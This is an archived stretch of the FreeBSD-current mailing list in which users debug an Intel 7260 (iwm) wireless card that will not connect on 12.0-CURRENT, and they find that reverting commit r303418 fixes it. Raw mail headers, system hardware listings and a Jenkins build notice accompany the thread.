(Postfix) with ESMTPS id D04AE12B7; Thu, 28 Jul 2016 23:15:38 +0000 (UTC) (envelope-from baptiste.daroussin@gmail.com) Received: by mail-wm0-x230.google.com with SMTP id f65so269688174wmi.0; Thu, 28 Jul 2016 16:15:38 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=sender:date:from:to:cc:subject:message-id:references:mime-version :content-disposition:in-reply-to:user-agent; bh=42I4ciKqlVRFFiADmgKzULfWZXvEaLJ8MAiv717uGO4=; b=GG/iMQfFKA/oEmfi55HeEmj6VCTwdKc9bkPOJP2iIoVWKtaX3g4TWDp00TR72MIObv NStbYfMKw3bZpDXrwxUUgi1Q7KUhz43WRY14ZTgwFDoWPhA5XI0QfVD0EWK/N6iiishY PA/Zx8rrLCATJyLd+gLKL8O4UVln1SC4WIg+IUrv6z41jdCF1D/XE6M4KanM7QLenrXY Il1Cuh2MzwCChg/l1cJE6wYHgvplzER1D1TaU9APWJ445sZvQSZJi8HNizNDNACcMCr1 Y/A1viXrNCOiGkJ3k9IstQjsS2JX4E3GX16A0udYNuAP8OqjE+uA9iMnElgFSjCxLL+r JStg== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:sender:date:from:to:cc:subject:message-id :references:mime-version:content-disposition:in-reply-to:user-agent; bh=42I4ciKqlVRFFiADmgKzULfWZXvEaLJ8MAiv717uGO4=; b=LVzneQQyrOF3nf3uTY36+/Zgm7mHFHUO7VyfBN4yvGg8aEp70SRp9HiSTq3UCxjE6Q MbznqtilZF7k8P8reeOmIyVaXiaOIrKtEyJEZIbZ1yc/WkgUyo3F4HoTF939CkRxk6fU ZOUH4fAKbTwBvrAg5cBl6bJ+14YfvbpdyeFnJMeaIYq6Hk0OFCsddcXzWx6nlJDPAcQm e5pBpXx4HjS1waF8FuAqnMjmF4JyvAtoOmkFwlrvklstD3vNE8P3oX8RZy/3DO7q8K4l G6tUSyf/Qw8xmc7xDnHWDfLBg8vgwf21X/hZsVmCyeLnbPPdtFrz9rUQbVguFZY0RjnS 9M+w== X-Gm-Message-State: AEkoousBpxOZ61yRu+S6hivnfuoO357/dh5kXWf2uFTkXTfIb7IL7j034O5QLIkHxOKRHg== X-Received: by 10.194.65.230 with SMTP id a6mr35887196wjt.73.1469747737009; Thu, 28 Jul 2016 16:15:37 -0700 (PDT) Received: from ivaldir.etoilebsd.net ([2001:41d0:8:db4c::1]) by smtp.gmail.com with ESMTPSA id c8sm13674361wjm.19.2016.07.28.16.15.34 (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Thu, 28 Jul 2016 16:15:35 -0700 (PDT) Sender: Baptiste Daroussin Date: Fri, 29 Jul 2016 01:15:34 +0200 From: Baptiste Daroussin To: Larry Rosenman Cc: Adrian Chadd , freebsd-wireless@freebsd.org, freebsd-current Subject: Re: IWM(7260), no connect Message-ID: <20160728231534.dnfjyoippqhu6b5y@ivaldir.etoilebsd.net> References: <20160728023954.GA1321@pita> <6421da24a2ec668667f83a3255dc247f@thebighonker.lerctr.org> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha256; protocol="application/pgp-signature"; boundary="ev24qeoihmjxfpuh" Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.6.1-neo (2016-06-11) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 23:15:39 -0000 --ev24qeoihmjxfpuh Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Jul 28, 2016 at 06:10:26PM -0500, Larry Rosenman wrote: > negative. no reponse (except for this one) at all. > :( >=20 He did reply: https://lists.freebsd.org/pipermail/freebsd-wireless/2016-July/006897.html Best regards, Bapt --ev24qeoihmjxfpuh Content-Type: application/pgp-signature; name="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQIcBAEBCAAGBQJXmpIUAAoJEGOJi9zxtz5afpkQAKFDorTz5vQllU07O7dDGoC6 9heineZvo1pkJxv/mokgEWCMO6HaF3uKGYtXHoBDd96GXUQsgSYPJVw050WX0neE duTawEH3ztklldMa3ltWBljrIVGE10TiYL8liH1Syb7JDVYuob2bIP5iqGqXfe3Q exxvIyjzD7z+QeYefpA8el9npXlhTIGfQE1lYhkp8ryqUoOzWfcx7seFFTI7hhz6 5gelkcVAWzMrGxBynDR287P5p2wKljQLk1vjPraJtjmWsJ01a5+3Q2cFYPsVXeCq 6EUORAgz+Xf7zZvS47ZaqSzYvo9b1Btlsko+oOmiOcIIscm4W3r1dcjzMp7qimr7 W6RLsvHsT18sNkUzWasQUtD/15YmwA33eaQeCDjh83D+Dst0loHF1MFxqXXv+XTa 24BSe7y8wIz007cj0h86VXgNbxMfHaMSLhTCycGBmSQ9RVGXpPYf70SYKrFqV4P7 LikgUVoYwDWLXR99hsTk39WX/EY1GLLROklqp3hoA0jomHfjlgRdpkms5s8zB1ah zRA8BrKUxNuF5P7eD9kCpiPqvEaNidSzcyp0uG2TWgYZhshTEl4hxFAETiIX+X91 xm2BcikDMxK6luhQaCaJ4zljbq+Vc8+EkGtFgT+Vw7Da/C7ClgwSrkp/reQffeL3 EZZEjO5ECjt0nZEmp5/n =j9tJ -----END PGP SIGNATURE----- --ev24qeoihmjxfpuh-- From owner-freebsd-current@freebsd.org Thu Jul 28 23:35:07 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 3682BBA7A78; Thu, 28 Jul 2016 23:35:07 +0000 (UTC) (envelope-from ler@lerctr.org) Received: from thebighonker.lerctr.org (thebighonker.lerctr.org [IPv6:2001:470:1f0f:3ad:223:7dff:fe9e:6e8a]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client CN "thebighonker.lerctr.org", Issuer "COMODO RSA Domain Validation Secure Server CA" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 06AA31A2B; Thu, 28 Jul 2016 23:35:07 +0000 (UTC) (envelope-from ler@lerctr.org) DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=lerctr.org; s=lerami; h=In-Reply-To:Content-Type:MIME-Version:References:Message-ID: Subject:Cc:To:From:Date:Sender:Reply-To:Content-Transfer-Encoding:Content-ID: Content-Description:Resent-Date:Resent-From:Resent-Sender:Resent-To:Resent-Cc :Resent-Message-ID:List-Id:List-Help:List-Unsubscribe:List-Subscribe: List-Post:List-Owner:List-Archive; bh=lAPgiNe79afnHpPfJtlRyjzuG1C3Z/YIqU2GEW4jm5E=; b=QoYtEr0K9FNEJ1L2F8WxL8sC6t /AUxQ9PwVa/nW0QEsYBYZi+BwGG69QuzcWexyYAW7V9a9Grrr0wY4+JB6Bs1Er8i1fOcQRItcGpUw Hu9ueqzs36///HLaXaLMduQww+aVLgEGHqESy+oqItE965u3KgjcYzuHwiSVuk8gtRFo=; Received: from [74.196.221.212] (port=23377 helo=pita) by thebighonker.lerctr.org with esmtpsa (TLSv1.2:ECDHE-RSA-AES256-GCM-SHA384:256) (Exim 4.87 (FreeBSD)) (envelope-from ) id 1bSupW-000GUe-5E; Thu, 28 Jul 2016 18:35:06 -0500 Date: Thu, 28 Jul 2016 18:35:04 -0500 From: Larry Rosenman To: Andriy Voskoboinyk Cc: freebsd-wireless@freebsd.org, freebsd-current@freebsd.org Subject: Re: IWM(7260), no connect Message-ID: <20160728233504.GA1226@pita> Mail-Followup-To: Andriy Voskoboinyk , freebsd-wireless@freebsd.org, freebsd-current@freebsd.org References: <20160728023954.GA1321@pita> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.6.1 (2016-04-27) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 23:35:07 -0000 That seems to fix it, and I'm sorry I missed this in my Inbox earlier. On Thu, Jul 28, 2016 at 12:12:42PM +0300, Andriy Voskoboinyk wrote: > Thu, 28 Jul 2016 05:39:55 +0300 ???????? ???????????????? Larry Rosenman > : > > Try to revert r303418 (as I can see, r303416 and/or r303413 are not the > reason > of this). > > In case, if this will not help, you can try to add > wlandebug_wlan0="state+scan+auth+assoc" > into rc.conf to see where it fails. > > > I'm running today's top of tree, and it doesn't seem to want to connect: > > > > > > re0: flags=8843 metric 0 mtu 1500 > > options=8209b > > ether 20:47:47:73:07:5f > > inet6 fe80::2247:47ff:fe73:75f%re0 prefixlen 64 scopeid 0x1 > > inet6 2001:470:1f0f:42c:2247:47ff:fe73:75f prefixlen 64 autoconf > > inet 192.168.200.246 netmask 0xfffffc00 broadcast 192.168.203.255 > > nd6 options=23 > > media: Ethernet autoselect (1000baseT ) > > status: active > > lo0: flags=8049 metric 0 mtu 16384 > > options=600003 > > inet6 ::1 prefixlen 128 > > inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2 > > inet 127.0.0.1 netmask 0xff000000 > > nd6 options=21 > > groups: lo > > wlan0: flags=8c43 metric > > 0 mtu 1500 > > ether 58:91:cf:1a:45:69 > > inet6 fe80::5a91:cfff:fe1a:4569%wlan0 prefixlen 64 scopeid 0x3 > > nd6 options=23 > > media: IEEE 802.11 Wireless Ethernet autoselect (autoselect) > > status: no carrier > > ssid "" channel 8 (2447 MHz 11g) > > regdomain FCC country US authmode WPA1+WPA2/802.11i privacy ON > > deftxkey UNDEF txpower 30 bmiss 10 scanvalid 60 protmode CTS wme > > roaming MANUAL > > groups: wlan > > > > > > hostb0@pci0:0:0:0: class=0x060000 card=0x07061028 chip=0x19108086 > > rev=0x07 hdr=0x00 > > vendor = 'Intel Corporation' > > device = 'Skylake Host Bridge/DRAM Registers' > > class = bridge > > subclass = HOST-PCI > > pcib1@pci0:0:1:0: class=0x060400 card=0x20158086 chip=0x19018086 > > rev=0x07 hdr=0x01 > > vendor = 'Intel Corporation' > > device = 'Skylake PCIe Controller (x16)' > > class = bridge > > subclass = PCI-PCI > > pcib2@pci0:0:1:1: class=0x060400 card=0x07061028 chip=0x19058086 > > rev=0x07 hdr=0x01 > > vendor = 'Intel Corporation' > > device = 'Skylake PCIe Controller (x8)' > > class = bridge > > subclass = PCI-PCI > > vgapci1@pci0:0:2:0: class=0x030000 card=0x07061028 chip=0x191b8086 > > rev=0x06 hdr=0x00 > > vendor = 'Intel Corporation' > > device = 'HD Graphics 530' > > class = display > > subclass = VGA > > none0@pci0:0:4:0: class=0x118000 card=0x07061028 chip=0x19038086 > > rev=0x07 hdr=0x00 > > vendor = 'Intel Corporation' > > device = 'Skylake Processor Thermal Subsystem' > > class = dasp > > xhci0@pci0:0:20:0: class=0x0c0330 card=0x07061028 chip=0xa12f8086 > > rev=0x31 hdr=0x00 > > vendor = 'Intel Corporation' > > device = 'Sunrise Point-H USB 3.0 xHCI Controller' > > class = serial bus > > subclass = USB > > none1@pci0:0:20:2: class=0x118000 card=0x07061028 chip=0xa1318086 > > rev=0x31 hdr=0x00 > > vendor = 'Intel Corporation' > > device = 'Sunrise Point-H Thermal subsystem' > > class = dasp > > none2@pci0:0:21:0: class=0x118000 card=0x07061028 chip=0xa1608086 > > rev=0x31 hdr=0x00 > > vendor = 'Intel Corporation' > > device = 'Sunrise Point-H Serial IO I2C Controller' > > class = dasp > > none3@pci0:0:22:0: class=0x078000 card=0x07061028 chip=0xa13a8086 > > rev=0x31 hdr=0x00 > > vendor = 'Intel Corporation' > > device = 'Sunrise Point-H CSME HECI' > > class = simple comms > > ahci0@pci0:0:23:0: class=0x010601 card=0x07061028 chip=0xa1038086 > > rev=0x31 hdr=0x00 > > vendor = 'Intel Corporation' > > device = 'Sunrise Point-H SATA Controller [AHCI mode]' > > class = mass storage > > subclass = SATA > > pcib3@pci0:0:28:0: class=0x060400 card=0x07061028 chip=0xa1108086 > > rev=0xf1 hdr=0x01 > > vendor = 'Intel Corporation' > > device = 'Sunrise Point-H PCI Express Root Port' > > class = bridge > > subclass = PCI-PCI > > pcib4@pci0:0:28:4: class=0x060400 card=0x07061028 chip=0xa1148086 > > rev=0xf1 hdr=0x01 > > vendor = 'Intel Corporation' > > device = 'Sunrise Point-H PCI Express Root Port' > > class = bridge > > subclass = PCI-PCI > > pcib5@pci0:0:28:5: class=0x060400 card=0x07061028 chip=0xa1158086 > > rev=0xf1 hdr=0x01 > > vendor = 'Intel Corporation' > > device = 'Sunrise Point-H PCI Express Root Port' > > class = bridge > > subclass = PCI-PCI > > pcib6@pci0:0:28:6: class=0x060400 card=0x07061028 chip=0xa1168086 > > rev=0xf1 hdr=0x01 > > vendor = 'Intel Corporation' > > device = 'Sunrise Point-H PCI Express Root Port' > > class = bridge > > subclass = PCI-PCI > > isab0@pci0:0:31:0: class=0x060100 card=0x07061028 chip=0xa14e8086 > > rev=0x31 hdr=0x00 > > vendor = 'Intel Corporation' > > device = 'Sunrise Point-H LPC Controller' > > class = bridge > > subclass = PCI-ISA > > none4@pci0:0:31:2: class=0x058000 card=0x07061028 chip=0xa1218086 > > rev=0x31 hdr=0x00 > > vendor = 'Intel Corporation' > > device = 'Sunrise Point-H PMC' > > class = memory > > hdac0@pci0:0:31:3: class=0x040300 card=0x07061028 chip=0xa1708086 > > rev=0x31 hdr=0x00 > > vendor = 'Intel Corporation' > > device = 'Sunrise Point-H HD Audio' > > class = multimedia > > subclass = HDA > > none5@pci0:0:31:4: class=0x0c0500 card=0x07061028 chip=0xa1238086 > > rev=0x31 hdr=0x00 > > vendor = 'Intel Corporation' > > device = 'Sunrise Point-H SMBus' > > class = serial bus > > subclass = SMBus > > vgapci0@pci0:2:0:0: class=0x030200 card=0x07061028 chip=0x139b10de > > rev=0xa2 hdr=0x00 > > vendor = 'NVIDIA Corporation' > > device = 'GM107M [GeForce GTX 960M]' > > class = display > > subclass = 3D > > re0@pci0:4:0:0: class=0x020000 card=0x07061028 chip=0x816810ec rev=0x10 > > hdr=0x00 > > vendor = 'Realtek Semiconductor Co., Ltd.' > > device = 'RTL8111/8168/8411 PCI Express Gigabit Ethernet > > Controller' > > class = network > > subclass = ethernet > > iwm0@pci0:5:0:0: class=0x028000 card=0xc0708086 chip=0x08b18086 rev=0x6b > > hdr=0x00 > > vendor = 'Intel Corporation' > > device = 'Wireless 7260' > > class = network > > none6@pci0:6:0:0: class=0xff0000 card=0x522a10ec chip=0x522a10ec > > rev=0x01 hdr=0x00 > > vendor = 'Realtek Semiconductor Co., Ltd.' > > device = 'RTS522A PCI Express Card Reader' > > > > > > What other info do we need? > > > > > > > > Path: /usr/src > > Working Copy Root Path: /usr/src > > URL: https://svn.freebsd.org/base/head > > Relative URL: ^/head > > Repository Root: https://svn.freebsd.org/base > > Repository UUID: ccf9f872-aa2e-dd11-9fc8-001c23d0bc1f > > Revision: 303419 > > Node Kind: directory > > Schedule: normal > > Last Changed Author: bdrewery > > Last Changed Rev: 303419 > > Last Changed Date: 2016-07-27 16:45:11 -0500 (Wed, 27 Jul 2016) > > > > > > FreeBSD pita 12.0-CURRENT FreeBSD 12.0-CURRENT #2 r303419: Wed Jul 27 > > 21:22:29 CDT 2016 root@pita:/usr/obj/usr/src/sys/IWM-DEBUG amd64 > > 1200001 1200001 -- Larry Rosenman http://www.lerctr.org/~ler Phone: +1 214-642-9640 E-Mail: ler@lerctr.org US Mail: 17716 Limpia Crk, Round Rock, TX 78664-7281 From owner-freebsd-current@freebsd.org Fri Jul 29 00:28:46 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 5E176BA786F for ; Fri, 29 Jul 2016 00:28:46 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id 50582119A; Fri, 29 Jul 2016 00:28:46 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id 7624A164; Fri, 29 Jul 2016 00:28:46 +0000 (UTC) Date: Fri, 29 Jul 2016 00:28:45 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org Message-ID: <1946667759.46.1469752125626.JavaMail.jenkins@jenkins-9.freebsd.org> In-Reply-To: <240778904.45.1469742643105.JavaMail.jenkins@jenkins-9.freebsd.org> References: <240778904.45.1469742643105.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: Jenkins build is unstable: FreeBSD_HEAD #493 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkKKb2VAfYQKfu1t7qk4nR5qzUBEI+UqT4BPec4qHVhqUy0FFdq50sMH+3y9bCDNOufctov6VqTNffZ3YXArnZK95YF0OX97fh+E9txYOUX1adc+TikcKjuYpHmL5dE62eaZTI+4A5jnRonskQ1PaoIFz0Kbu4mWzkFsmdiXTraGzomXq4cHUCATA2+K4eDYgjXEQI30z3GOMmmZ4t/+6QGk1cMb/BqMWHbn80AsRCb4tU7Hpd72XLDpsuO7YRP1Q0CjmNAuBOTj+sFiiOe6U9HpqOlQN+iFUvBdZo/ybuy5Kh71cAaYQNL68cYdZJ6binH/DkG3KY/fS7DFYAeuwjwIDAQAB X-Jenkins-Job: FreeBSD_HEAD X-Jenkins-Result: UNSTABLE X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 00:28:46 -0000 See From owner-freebsd-current@freebsd.org Fri Jul 29 01:02:44 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 9EB90BA6019; Fri, 29 Jul 2016 01:02:44 +0000 (UTC) (envelope-from adrian.chadd@gmail.com) Received: from mail-io0-x233.google.com (mail-io0-x233.google.com [IPv6:2607:f8b0:4001:c06::233]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 6760F1E93; Fri, 29 Jul 2016 01:02:44 +0000 (UTC) (envelope-from adrian.chadd@gmail.com) Received: by mail-io0-x233.google.com with SMTP id m101so115462221ioi.2; Thu, 28 Jul 2016 18:02:44 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:from:date:message-id:subject:to; bh=gs/SQ5XQtll006vdx9f4jRfygIt8kwPqEgmhjTdNzNI=; b=rkOCG9OFErKcv4Ob7EOwLOQ/ViqRohAPEKErWbGqEQvgoDY5kmhOAUS3Y0QSWNcTMl m6EOqljLWUXTwkIEvTVsCrwp7jht5cgaLRDILJn/8SoRDl+6TBseO5h/v9OOSbVlnsuT +LV4h6crFlkWcv3Cxuy7nxM/c/XD2hH/5xi2DHDqLt1WhEJGp/2G0GJ2g0mahKHWyJd8 YctNVT8Q6ofoaXHji7/4Mw8n1TQLjThZMylBL3WDlg+5EXF6sBLbjK9gUPdCsO0BcJf/ n4abE/J7S9O/yJjnEN7rndIh93i6JxY/S115CreLp/lt3Ede06yk0M/vQmuj7JfJxP4J mDGg== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:mime-version:in-reply-to:references:from:date :message-id:subject:to; bh=gs/SQ5XQtll006vdx9f4jRfygIt8kwPqEgmhjTdNzNI=; b=JYygSjIDSLls4iQneLjy5vP3eNthWaLok9ybCif1dJLEopKnTxiI5Len090QQYQ3Uh IJLCC3b1HJ2DCmM4CBRXba/Bt01VedUMFL7AoACPqw6CuCcu5EGvva0YaAZel+crxW9d gdwAd2h746wgsJa6itnvFGNFmQ5+IA27OLaA/za9LIvcYXraR9efhorpnYJs9ur/MB+B al8vYiLwecYd4RN4rbb3jRRbwp6q5j6dPeU6aD5+hERTThfj+AdzjwTpCr2M3Wj9eHbK fgYhDlalmt8XL1gFzYCQ21g/U1xz48+zRTdAOfA9ERW27uEmbCplqgR/Jkr4uATb5gtA i5LQ== X-Gm-Message-State: AEkoouuKac7tdjIJHS/Ic2VTFWPwMu/dSNrr2htO0ipyEGpvLZ6XblGPzdRYMXcIpTbYHMkgJ2FNdhVHicUI+w== X-Received: by 10.107.144.10 with SMTP id s10mr39627079iod.165.1469754163565; Thu, 28 Jul 2016 18:02:43 -0700 (PDT) MIME-Version: 1.0 Received: by 10.36.141.129 with HTTP; Thu, 28 Jul 2016 18:02:42 -0700 (PDT) In-Reply-To: <20160728233504.GA1226@pita> References: <20160728023954.GA1321@pita> <20160728233504.GA1226@pita> From: Adrian Chadd Date: Thu, 28 Jul 2016 18:02:42 -0700 Message-ID: Subject: Re: IWM(7260), no connect To: Andriy Voskoboinyk , "freebsd-wireless@freebsd.org" , freebsd-current Content-Type: text/plain; charset=UTF-8 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 01:02:44 -0000 Hi, Which commit(s) did you revert? -a From owner-freebsd-current@freebsd.org Fri Jul 29 01:05:33 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id DBDBEBA60F5; Fri, 29 Jul 2016 01:05:33 +0000 (UTC) (envelope-from ler@lerctr.org) Received: from thebighonker.lerctr.org (thebighonker.lerctr.org [IPv6:2001:470:1f0f:3ad:223:7dff:fe9e:6e8a]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client CN "thebighonker.lerctr.org", Issuer "COMODO RSA Domain Validation Secure Server CA" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id B8CC91166; Fri, 29 Jul 2016 01:05:33 +0000 (UTC) (envelope-from ler@lerctr.org) DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=lerctr.org; s=lerami; h=Message-ID:References:In-Reply-To:Subject:Cc:To:From:Date: Content-Transfer-Encoding:Content-Type:MIME-Version:Sender:Reply-To: Content-ID:Content-Description:Resent-Date:Resent-From:Resent-Sender: Resent-To:Resent-Cc:Resent-Message-ID:List-Id:List-Help:List-Unsubscribe: List-Subscribe:List-Post:List-Owner:List-Archive; bh=dXhOv5ggbRoXuAhwvwLzN/E8bRUffU37nm18f8gfziE=; b=nXp1cO9vNHQwrQjjsCyhvFrCR0 uk590HOCpg7PSJ0OqrrINCJ3Ollk/5C6E4GpAYBkbgnvtGeK3mHD7hgbuT/Js72/g+dyUvLfKqEQ0 eDl1YfKjjveTgUgM8yq1L+k6b72WjgCkpKfIS3LalKu2dbBPa2CmJAYhr7Fdd0Bukohc=; Received: from thebighonker.lerctr.org ([2001:470:1f0f:3ad:223:7dff:fe9e:6e8a]:45745 helo=webmail.lerctr.org) by thebighonker.lerctr.org with esmtpsa (TLSv1.2:ECDHE-RSA-AES128-GCM-SHA256:128) (Exim 4.87 (FreeBSD)) (envelope-from ) id 1bSwF2-000JC9-Kv; Thu, 28 Jul 2016 20:05:32 -0500 Received: from 2001:470:1f0f:42c:b9cb:216a:6647:9bf0 by webmail.lerctr.org with HTTP (HTTP/1.1 POST); Thu, 28 Jul 2016 20:05:32 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII; format=flowed Content-Transfer-Encoding: 7bit Date: Thu, 28 Jul 2016 20:05:32 -0500 From: Larry Rosenman To: Adrian Chadd Cc: Andriy Voskoboinyk , freebsd-wireless@freebsd.org, freebsd-current , owner-freebsd-current@freebsd.org Subject: Re: IWM(7260), no connect In-Reply-To: References: <20160728023954.GA1321@pita> <20160728233504.GA1226@pita> Message-ID: <4ee03d28cc2711ed9bc56a725cac344a@thebighonker.lerctr.org> X-Sender: ler@lerctr.org User-Agent: Roundcube Webmail/1.2.0 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 01:05:34 -0000 On 2016-07-28 20:02, Adrian Chadd wrote: > Hi, > > Which commit(s) did you revert? > > > > -a revert r303418 and now it connects again. -- Larry Rosenman http://www.lerctr.org/~ler Phone: +1 214-642-9640 E-Mail: ler@lerctr.org US Mail: 17716 Limpia Crk, Round Rock, TX 78664-7281 From owner-freebsd-current@freebsd.org Fri Jul 29 01:06:49 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 20072BA61D6; Fri, 29 Jul 2016 01:06:49 +0000 (UTC) (envelope-from adrian.chadd@gmail.com) Received: from mail-it0-x22e.google.com (mail-it0-x22e.google.com [IPv6:2607:f8b0:4001:c0b::22e]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id D91D512CD; Fri, 29 Jul 2016 01:06:48 +0000 (UTC) (envelope-from adrian.chadd@gmail.com) Received: by mail-it0-x22e.google.com with SMTP id j124so96234873ith.1; Thu, 28 Jul 2016 18:06:48 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:from:date:message-id:subject:to :cc; bh=Z3J7UFgoGB/jMdOenZSmlfU8QxZAbTByyBT0Cjc4XAY=; b=EbaVZPjp8WyP3bh6YCoYd1UWoerYyBK7TodrGszeqtFydbnsZzpL5Xdceehukw30GN OXOs92v4gOzMmT7fvu8Sb+gD3F0z31PkWx0dJQce+KeY45S3axTWg1ULMvARXjkdshOs tr6i9acpgvecGxmTMIAANy2CJt+yZ3oeSoOY03XGtrswYXaLqlnaokAF5TwOsLKl0uYc EkmU6Ss3Li1BXTdB6GO/8fvvzdjguRtZCNxLcRKAVsiht4UPd6tPaaV14T5fpGe+oWPg gjhuwup8A/hTWzm8ZTlTF5qvzVZCFBT749TuoJwL295W0XwmFmlZAHbAbFMl29y0eqBa 04nw== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:mime-version:in-reply-to:references:from:date :message-id:subject:to:cc; bh=Z3J7UFgoGB/jMdOenZSmlfU8QxZAbTByyBT0Cjc4XAY=; b=ZXxpyTmJVltAxUDBkhpH1vamBRmx0aNvgd51DLy7uSdNpJJU+0kqcfFP7NIon/vmAh o6CvgJrizEJGeQW7xu6O3i867HMKx6OzXd3iV+xOnqLpUZbv5kgfbv6CLPcIDrZXGR+M KyHlvz6HmR7gXr/rIZwmEK1BzytcKQauOuFeGVhkE8hlf4fn805Ex6B3LHJxF3gDeROa fBXSc5kiWGESk1Mm5f8Ub3TQ1dfpL45IGoyZ2koBNMDuVbOa5n/7tXG0oHWNtD8o1HpX WtPNgLvpaB5KpZ5h/cjRmkXNkIbMT9SAwaVeB5fY2ureVr5nlPpQ38z0h2Un0a+wZeG3 SyLQ== X-Gm-Message-State: AEkooutdHlnLrm2/WFRayAscm0qRdWOS2VsKP1vH/UqXdXG/7I0GDVuMnFbbITd4wASbBz5+d+JR1zTVdDwHmw== X-Received: by 10.36.122.2 with SMTP id a2mr40464611itc.25.1469754408342; Thu, 28 Jul 2016 18:06:48 -0700 (PDT) MIME-Version: 1.0 Received: by 10.36.141.129 with HTTP; Thu, 28 Jul 2016 18:06:47 -0700 (PDT) In-Reply-To: <4ee03d28cc2711ed9bc56a725cac344a@thebighonker.lerctr.org> References: <20160728023954.GA1321@pita> <20160728233504.GA1226@pita> <4ee03d28cc2711ed9bc56a725cac344a@thebighonker.lerctr.org> From: Adrian Chadd Date: Thu, 28 Jul 2016 18:06:47 -0700 Message-ID: Subject: Re: IWM(7260), no connect To: Larry Rosenman , =?UTF-8?B?SW1yZSBWYWTDoXN6?= Cc: Andriy Voskoboinyk , "freebsd-wireless@freebsd.org" , freebsd-current , owner-freebsd-current@freebsd.org Content-Type: text/plain; charset=UTF-8 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: 